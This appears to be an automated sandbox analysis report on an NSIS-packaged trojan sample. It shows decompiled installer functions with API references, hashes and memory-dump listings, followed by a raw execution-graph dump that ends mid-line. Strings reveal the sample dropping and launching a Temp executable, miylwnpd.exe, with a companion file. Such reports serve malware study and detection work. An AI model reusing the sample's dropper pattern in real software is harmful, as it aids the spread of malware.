            0x00000000
            0x00401c87
            0x00401c8e
            0x00401c90
            0x00401c93
            0x00401c99
            0x00401ca0
            0x00401ca3
            0x00401ccb
            0x00401d03
            0x00401d03
            0x00401ca5
            0x00401cb3
            0x00401cbb
            0x00401cbe
            0x00401cbe
            0x00401ca3
            0x00401d06
            0x00401d09
            0x00401d0f
            0x00402ba4
            0x00402ba4
            0x00402c2d
            0x00402c39

            APIs
            • SendMessageTimeoutW.USER32 ref: 00401CB3
            • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CCB
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.242506590.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.242502803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242513299.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242517689.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242521683.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242769016.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242777565.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242784373.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242790346.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242830214.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242835324.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242841112.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
            Similarity
            • API ID: MessageSend$Timeout
            • String ID: !
            • API String ID: 1777923405-2657877971
            • Opcode ID: a925d33b65f5538ff345f0f48edbd750304bc8babfa6be52d46d5660b496d1e6
            • Instruction ID: a8e9040b9442a73e8ccf438a9e221504da771f110143023329da3593775932a3
            • Opcode Fuzzy Hash: a925d33b65f5538ff345f0f48edbd750304bc8babfa6be52d46d5660b496d1e6
            • Instruction Fuzzy Hash: 2D219C7190420AAFEF05AFA4D94AAAE7BB4FF84304F14453EF601B61D0D7B88941CB98
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 77%
            			E00404E77(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
            				char _v68;
            				char _v132;
            				void* __ebx;
            				void* __edi;
            				void* __esi;
            				signed int _t23;
            				signed int _t24;
            				void* _t31;
            				void* _t33;
            				void* _t34;
            				void* _t44;
            				signed int _t46;
            				signed int _t50;
            				signed int _t52;
            				signed int _t53;
            				signed int _t55;
            
            				_t23 = _a16;
            				_t53 = _a12;
            				_t44 = 0xffffffdc;
            				if(_t23 == 0) {
            					_push(0x14);
            					_pop(0);
            					_t24 = _t53;
            					if(_t53 < 0x100000) {
            						_push(0xa);
            						_pop(0);
            						_t44 = 0xffffffdd;
            					}
            					if(_t53 < 0x400) {
            						_t44 = 0xffffffde;
            					}
            					if(_t53 < 0xffff3333) {
            						_t52 = 0x14;
            						asm("cdq");
            						_t24 = 1 / _t52 + _t53;
            					}
            					_t25 = _t24 & 0x00ffffff;
            					_t55 = _t24 >> 0;
            					_t46 = 0xa;
            					_t50 = ((_t24 & 0x00ffffff) + _t25 * 4 + (_t24 & 0x00ffffff) + _t25 * 4 >> 0) % _t46;
            				} else {
            					_t55 = (_t23 << 0x00000020 | _t53) >> 0x14;
            					_t50 = 0;
            				}
            				_t31 = E004066AB(_t44, _t50, _t55,  &_v68, 0xffffffdf);
            				_t33 = E004066AB(_t44, _t50, _t55,  &_v132, _t44);
            				_t34 = E004066AB(_t44, _t50, 0x7a1f88, 0x7a1f88, _a8);
            				wsprintfW(_t34 + lstrlenW(0x7a1f88) * 2, L"%u.%u%s%s", _t55, _t50, _t33, _t31);
            				return SetDlgItemTextW( *0x7a7a78, _a4, 0x7a1f88);
            			}



















            0x00404e80
            0x00404e85
            0x00404e8d
            0x00404e8e
            0x00404e9b
            0x00404ea3
            0x00404ea4
            0x00404ea6
            0x00404ea8
            0x00404eaa
            0x00404ead
            0x00404ead
            0x00404eb4
            0x00404eba
            0x00404eba
            0x00404ec1
            0x00404ec8
            0x00404ecb
            0x00404ece
            0x00404ece
            0x00404ed2
            0x00404ee2
            0x00404ee4
            0x00404ee7
            0x00404e90
            0x00404e90
            0x00404e97
            0x00404e97
            0x00404eef
            0x00404efa
            0x00404f10
            0x00404f21
            0x00404f3d

            APIs
            • lstrlenW.KERNEL32(007A1F88,007A1F88,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404F18
            • wsprintfW.USER32 ref: 00404F21
            • SetDlgItemTextW.USER32 ref: 00404F34
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.242506590.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.242502803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242513299.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242517689.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242521683.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242769016.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242777565.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242784373.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242790346.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242830214.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242835324.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242841112.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
            Similarity
            • API ID: ItemTextlstrlenwsprintf
            • String ID: %u.%u%s%s
            • API String ID: 3540041739-3551169577
            • Opcode ID: 4298df8fa65d3e63540fdf60f99430adbe5e40f9a8b71c27c1b7671c68856ea4
            • Instruction ID: f4f79be78f3b00f65903d53a5db5cb29a0acdec533a94133042e7cdde7caf59d
            • Opcode Fuzzy Hash: 4298df8fa65d3e63540fdf60f99430adbe5e40f9a8b71c27c1b7671c68856ea4
            • Instruction Fuzzy Hash: 5711D5736041282BDB00A56DDD45E9F3288AB81334F250637FA25F21D1EA79882186E8
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 58%
            			E00405F3D(WCHAR* _a4) {
            				WCHAR* _t9;
            
            				_t9 = _a4;
            				_push( &(_t9[lstrlenW(_t9)]));
            				_push(_t9);
            				if( *(CharPrevW()) != 0x5c) {
            					lstrcatW(_t9, 0x40a014);
            				}
            				return _t9;
            			}




            0x00405f3e
            0x00405f4b
            0x00405f4c
            0x00405f57
            0x00405f5f
            0x00405f5f
            0x00405f67

            APIs
            • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403633,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403929), ref: 00405F43
            • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403633,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403929), ref: 00405F4D
            • lstrcatW.KERNEL32(?,0040A014), ref: 00405F5F
            Strings
            • C:\Users\user\AppData\Local\Temp\, xrefs: 00405F3D
            Memory Dump Source
            • Source File: 00000000.00000002.242506590.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.242502803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242513299.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242517689.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242521683.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242769016.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242777565.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242784373.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242790346.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242830214.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242835324.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242841112.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
            Similarity
            • API ID: CharPrevlstrcatlstrlen
            • String ID: C:\Users\user\AppData\Local\Temp\
            • API String ID: 2659869361-3081826266
            • Opcode ID: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
            • Instruction ID: 4d139d42d978cba7810d0072a9498665e67a0d594e33c17037060be18c5eefd9
            • Opcode Fuzzy Hash: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
            • Instruction Fuzzy Hash: F6D0A771101A306EC1117B648C04CDF729CEE89344346443BF901B70A0CB7D1D5287FD
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 89%
            			E00405644(struct HWND__* _a4, int _a8, int _a12, long _a16) {
            				int _t15;
            				long _t16;
            
            				_t15 = _a8;
            				if(_t15 != 0x102) {
            					if(_t15 != 0x200) {
            						_t16 = _a16;
            						L7:
            						if(_t15 == 0x419 &&  *0x7a1f74 != _t16) {
            							_push(_t16);
            							_push(6);
            							 *0x7a1f74 = _t16;
            							E00405005();
            						}
            						L11:
            						return CallWindowProcW( *0x7a1f7c, _a4, _t15, _a12, _t16);
            					}
            					if(IsWindowVisible(_a4) == 0) {
            						L10:
            						_t16 = _a16;
            						goto L11;
            					}
            					_t16 = E00404F85(_a4, 1);
            					_t15 = 0x419;
            					goto L7;
            				}
            				if(_a12 != 0x20) {
            					goto L10;
            				}
            				E00404616(0x413);
            				return 0;
            			}





            0x00405648
            0x00405652
            0x0040566e
            0x00405690
            0x00405693
            0x00405699
            0x004056a3
            0x004056a4
            0x004056a6
            0x004056ac
            0x004056ac
            0x004056b6
            0x00000000
            0x004056c4
            0x0040567b
            0x004056b3
            0x004056b3
            0x00000000
            0x004056b3
            0x00405687
            0x00405689
            0x00000000
            0x00405689
            0x00405658
            0x00000000
            0x00000000
            0x0040565f
            0x00000000

            APIs
            • IsWindowVisible.USER32(?), ref: 00405673
            • CallWindowProcW.USER32(?,?,?,?), ref: 004056C4
              • Part of subcall function 00404616: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404628
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.242506590.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.242502803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242513299.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242517689.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242521683.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242769016.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242777565.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242784373.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242790346.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242830214.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242835324.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242841112.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
            Similarity
            • API ID: Window$CallMessageProcSendVisible
            • String ID:
            • API String ID: 3748168415-3916222277
            • Opcode ID: 7939219b80a2ac52c1d0d435a37392739a133ef29b28caecab86fe9e557cc681
            • Instruction ID: d595ca740675a0faf81d7ea6a2f5abbfab032377942bf72e797c79c3d66f513a
            • Opcode Fuzzy Hash: 7939219b80a2ac52c1d0d435a37392739a133ef29b28caecab86fe9e557cc681
            • Instruction Fuzzy Hash: B1017131201609AFEF209F21DD80A9B3A26EB85754F904837FA08762D1C77B8D919F6D
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 90%
            			E0040653C(void* __ecx, void* __eflags, intOrPtr _a4, int _a8, short* _a12, char* _a16, signed int _a20) {
            				int _v8;
            				long _t21;
            				long _t24;
            				char* _t30;
            
            				asm("sbb eax, eax");
            				_v8 = 0x800;
            				_t21 = E004064DB(__eflags, _a4, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_a20);
            				_t30 = _a16;
            				if(_t21 != 0) {
            					L4:
            					 *_t30 =  *_t30 & 0x00000000;
            				} else {
            					_t24 = RegQueryValueExW(_a20, _a12, 0,  &_a8, _t30,  &_v8);
            					_t21 = RegCloseKey(_a20);
            					_t30[0x7fe] = _t30[0x7fe] & 0x00000000;
            					if(_t24 != 0 || _a8 != 1 && _a8 != 2) {
            						goto L4;
            					}
            				}
            				return _t21;
            			}







            0x0040654a
            0x0040654c
            0x00406564
            0x00406569
            0x0040656e
            0x004065ac
            0x004065ac
            0x00406570
            0x00406582
            0x0040658d
            0x00406593
            0x0040659e
            0x00000000
            0x00000000
            0x0040659e
            0x004065b2

            APIs
            • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000800,00000000,007A0F68,00000000,?,?,C:\Users\user\AppData\Local\Temp\miylwnpd.exe C:\Users\user\AppData\Local\Temp\zehirtbl,?,?,004067A3,80000002), ref: 00406582
            • RegCloseKey.ADVAPI32(?,?,004067A3,80000002,Software\Microsoft\Windows\CurrentVersion,C:\Users\user\AppData\Local\Temp\miylwnpd.exe C:\Users\user\AppData\Local\Temp\zehirtbl,C:\Users\user\AppData\Local\Temp\miylwnpd.exe C:\Users\user\AppData\Local\Temp\zehirtbl,C:\Users\user\AppData\Local\Temp\miylwnpd.exe C:\Users\user\AppData\Local\Temp\zehirtbl,00000000,007A0F68), ref: 0040658D
            Strings
            • C:\Users\user\AppData\Local\Temp\miylwnpd.exe C:\Users\user\AppData\Local\Temp\zehirtbl, xrefs: 00406543
            Memory Dump Source
            • Source File: 00000000.00000002.242506590.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.242502803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242513299.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242517689.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242521683.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242769016.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242777565.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242784373.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242790346.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242830214.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242835324.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242841112.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
            Similarity
            • API ID: CloseQueryValue
            • String ID: C:\Users\user\AppData\Local\Temp\miylwnpd.exe C:\Users\user\AppData\Local\Temp\zehirtbl
            • API String ID: 3356406503-1723855214
            • Opcode ID: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
            • Instruction ID: 9e12fcea604be09863af9e628fe48d824a74a48827fd48a6b9c69832a92d0d42
            • Opcode Fuzzy Hash: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
            • Instruction Fuzzy Hash: DA015A72500209FADF218F51DC09EDB3BA8EB54364F01803AFD1AA2190E739D964DBA4
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 77%
            			E00405F89(WCHAR* _a4) {
            				WCHAR* _t5;
            				WCHAR* _t7;
            
            				_t7 = _a4;
            				_t5 =  &(_t7[lstrlenW(_t7)]);
            				while( *_t5 != 0x5c) {
            					_push(_t5);
            					_push(_t7);
            					_t5 = CharPrevW();
            					if(_t5 > _t7) {
            						continue;
            					}
            					break;
            				}
            				 *_t5 =  *_t5 & 0x00000000;
            				return  &(_t5[1]);
            			}





            0x00405f8a
            0x00405f94
            0x00405f97
            0x00405f9d
            0x00405f9e
            0x00405f9f
            0x00405fa7
            0x00000000
            0x00000000
            0x00000000
            0x00405fa7
            0x00405fa9
            0x00405fb1

            APIs
            • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,0040313C,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSISX.Spy.Gen.2.8452.exe,C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSISX.Spy.Gen.2.8452.exe,80000000,00000003), ref: 00405F8F
            • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,0040313C,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSISX.Spy.Gen.2.8452.exe,C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSISX.Spy.Gen.2.8452.exe,80000000,00000003), ref: 00405F9F
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.242506590.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.242502803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242513299.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242517689.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242521683.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242769016.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242777565.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242784373.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242790346.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242830214.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242835324.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242841112.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
            Similarity
            • API ID: CharPrevlstrlen
            • String ID: C:\Users\user\Desktop
            • API String ID: 2709904686-224404859
            • Opcode ID: 176def5b2db9ef34a9f22db2929791273b03e08e07d7b66f37effa829582f156
            • Instruction ID: 7456b8531bb3b8a4d8e8c00392aaf18f99b4ab5ae19bc30171d9ddc8328a16ac
            • Opcode Fuzzy Hash: 176def5b2db9ef34a9f22db2929791273b03e08e07d7b66f37effa829582f156
            • Instruction Fuzzy Hash: B1D05EB2411D219ED3126704DD0099F77A8EF5230174A4426E841E71A0D77C5C918AAD
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E004060C3(void* __ecx, CHAR* _a4, CHAR* _a8) {
            				int _v8;
            				int _t12;
            				int _t14;
            				int _t15;
            				CHAR* _t17;
            				CHAR* _t27;
            
            				_t12 = lstrlenA(_a8);
            				_t27 = _a4;
            				_v8 = _t12;
            				while(lstrlenA(_t27) >= _v8) {
            					_t14 = _v8;
            					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
            					_t15 = lstrcmpiA(_t27, _a8);
            					_t27[_v8] =  *(_t14 + _t27);
            					if(_t15 == 0) {
            						_t17 = _t27;
            					} else {
            						_t27 = CharNextA(_t27);
            						continue;
            					}
            					L5:
            					return _t17;
            				}
            				_t17 = 0;
            				goto L5;
            			}









            0x004060d3
            0x004060d5
            0x004060d8
            0x00406104
            0x004060dd
            0x004060e6
            0x004060eb
            0x004060f6
            0x004060f9
            0x00406115
            0x004060fb
            0x00406102
            0x00000000
            0x00406102
            0x0040610e
            0x00406112
            0x00406112
            0x0040610c
            0x00000000

            APIs
            • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004063A8,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060D3
            • lstrcmpiA.KERNEL32(00000000,00000000,?,00000000,004063A8,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060EB
            • CharNextA.USER32(00000000,?,00000000,004063A8,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060FC
            • lstrlenA.KERNEL32(00000000,?,00000000,004063A8,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406105
            Memory Dump Source
            • Source File: 00000000.00000002.242506590.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.242502803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242513299.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242517689.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242521683.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242769016.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242777565.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242784373.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242790346.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242830214.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242835324.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242841112.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
            Similarity
            • API ID: lstrlen$CharNextlstrcmpi
            • String ID:
            • API String ID: 190613189-0
            • Opcode ID: 4f145c51a58837bd7eda372618efc6ab74ada67201017ca859b4805a40dfc06b
            • Instruction ID: ebd02a31c913037c7252cee765efb5e80e8868db32339617edb9e16a90b2d78f
            • Opcode Fuzzy Hash: 4f145c51a58837bd7eda372618efc6ab74ada67201017ca859b4805a40dfc06b
            • Instruction Fuzzy Hash: 7CF0F631100054FFDB02DFA5CD40D9EBBA8DF46350B2640BAE841FB311D674DE11ABA8
            Uniqueness

            Uniqueness Score: -1.00%

            Execution Graph

            Execution Coverage:7.9%
            Dynamic/Decrypted Code Coverage:0%
            Signature Coverage:9.4%
            Total number of Nodes:1644
            Total number of Limit Nodes:98
            execution_graph 7295 2ea92c 7298 2ea94d 7295->7298 7297 2ea948 7299 2ea958 7298->7299 7300 2ea9b7 7298->7300 7299->7300 7302 2ea95d 7299->7302 7366 2eae9e 7300->7366 7303 2ea97b 7302->7303 7304 2ea962 7302->7304 7306 2ea99e 7303->7306 7309 2ea985 7303->7309 7312 2eb058 7304->7312 7353 2ea9d3 7306->7353 7331 2eb119 7309->7331 7310 2ea99c 7310->7297 7383 2ec11f 7312->7383 7315 2eb09d 7317 2eb0b5 7315->7317 7318 2eb0a5 7315->7318 7316 2eb08d 7319 2e1cc3 __chsize_nolock 58 API calls 7316->7319 7395 2ebfa7 7317->7395 7320 2e1cc3 __chsize_nolock 58 API calls 7318->7320 7321 2eb092 7319->7321 7323 2eb0aa 7320->7323 7322 2e1e89 __wcsnicmp_l 9 API calls 7321->7322 7327 2eb099 7322->7327 7325 2e1e89 __wcsnicmp_l 9 API calls 7323->7325 7325->7327 7326 2eb0e8 7326->7327 7404 2eaf6c 7326->7404 7328 2e5770 ___crt_atoflt_l 6 API calls 7327->7328 7330 2ea976 7328->7330 7330->7297 7332 2ec11f __fltout2 58 API calls 7331->7332 7333 2eb147 7332->7333 7334 2eb14e 7333->7334 7335 2eb161 7333->7335 7338 2e1cc3 __chsize_nolock 58 API calls 7334->7338 7336 2eb17c 7335->7336 7337 2eb169 7335->7337 7343 2ebfa7 __fptostr 58 API calls 7336->7343 7340 2e1cc3 __chsize_nolock 58 API calls 7337->7340 7339 2eb153 7338->7339 7341 2e1e89 __wcsnicmp_l 9 API calls 7339->7341 7342 2eb16e 7340->7342 7346 2eb15a 7341->7346 7344 2e1e89 __wcsnicmp_l 9 API calls 7342->7344 7345 2eb1a8 7343->7345 7344->7346 7345->7346 7347 2eb1ee 7345->7347 7349 2eb1c8 7345->7349 7348 2e5770 ___crt_atoflt_l 6 API calls 7346->7348 7433 2ead4d 7347->7433 7351 2eb214 7348->7351 7352 2eaf6c __cftof2_l 58 API calls 7349->7352 7351->7310 7352->7346 7354 2e4bfc _LocaleUpdate::_LocaleUpdate 58 API calls 7353->7354 7355 2ea9f8 7354->7355 7356 2eaa0f 7355->7356 7357 2eaa18 7355->7357 7358 2e1cc3 __chsize_nolock 58 API calls 7356->7358 7360 2eaa21 7357->7360 7363 2eaa35 7357->7363 7359 2eaa14 7358->7359 7362 2e1e89 __wcsnicmp_l 9 API calls 7359->7362 7361 2e1cc3 __chsize_nolock 58 API calls 7360->7361 7361->7359 7365 2eaa30 _memset __alldvrm __cftoa_l _strrchr 7362->7365 7363->7365 7465 2ead2f 7363->7465 7365->7310 7367 2ec11f __fltout2 58 API calls 7366->7367 7368 2eaed0 7367->7368 7369 2eaee7 7368->7369 7370 2eaed7 7368->7370 7372 2eaeee 7369->7372 7373 2eaef8 7369->7373 7371 2e1cc3 __chsize_nolock 58 API calls 7370->7371 7374 2eaedc 7371->7374 7375 2e1cc3 __chsize_nolock 58 API calls 7372->7375 7377 2ebfa7 __fptostr 58 API calls 7373->7377 7376 2e1e89 __wcsnicmp_l 9 API calls 7374->7376 7375->7374 7381 2eaee3 7376->7381 7378 2eaf38 7377->7378 7379 2ead4d __cftoe2_l 58 API calls 7378->7379 7378->7381 7379->7381 7380 2e5770 ___crt_atoflt_l 6 API calls 7382 2eaf68 7380->7382 7381->7380 7382->7310 7384 2ec148 ___dtold 7383->7384 7411 2ec3bd 7384->7411 7389 2ec18a 7391 2e5770 ___crt_atoflt_l 6 API calls 7389->7391 7390 2ec1a0 7392 2e1e99 __invoke_watson 8 API calls 7390->7392 7393 2eb086 7391->7393 7394 2ec1ac 7392->7394 7393->7315 7393->7316 7396 2ebfcf 7395->7396 7397 2ebfb9 7395->7397 7396->7397 7401 2ebfd5 7396->7401 7398 2e1cc3 __chsize_nolock 58 API calls 7397->7398 7399 2ebfbe 7398->7399 7400 2e1e89 __wcsnicmp_l 9 API calls 7399->7400 7403 2ebfc8 _memmove _strlen 7400->7403 7402 2e1cc3 __chsize_nolock 58 API calls 7401->7402 7401->7403 7402->7399 7403->7326 7405 2e4bfc _LocaleUpdate::_LocaleUpdate 58 API calls 7404->7405 7406 2eaf89 7405->7406 7407 2e1cc3 __chsize_nolock 58 API calls 7406->7407 7410 2eafa5 _memset __shift 7406->7410 7408 2eaf9b 7407->7408 7409 2e1e89 __wcsnicmp_l 9 API calls 7408->7409 7409->7410 7410->7327 7412 2ec412 7411->7412 7416 2ec484 7412->7416 7417 2ec49d 7412->7417 7423 2ec424 7412->7423 7413 2e5770 ___crt_atoflt_l 6 API calls 7415 2ec163 7413->7415 7414 2eb7bd _$I10_OUTPUT 58 API calls 7414->7423 7424 2eb7bd 7415->7424 7416->7414 7419 2eb7bd _$I10_OUTPUT 58 API calls 7417->7419 7418 2ecd59 7420 2e1e99 __invoke_watson 8 API calls 7418->7420 7419->7423 7421 2ecd90 7420->7421 7422 2ec435 7422->7413 7423->7418 7423->7422 7425 2eb7d6 7424->7425 7426 2eb7c8 7424->7426 7427 2e1cc3 __chsize_nolock 58 API 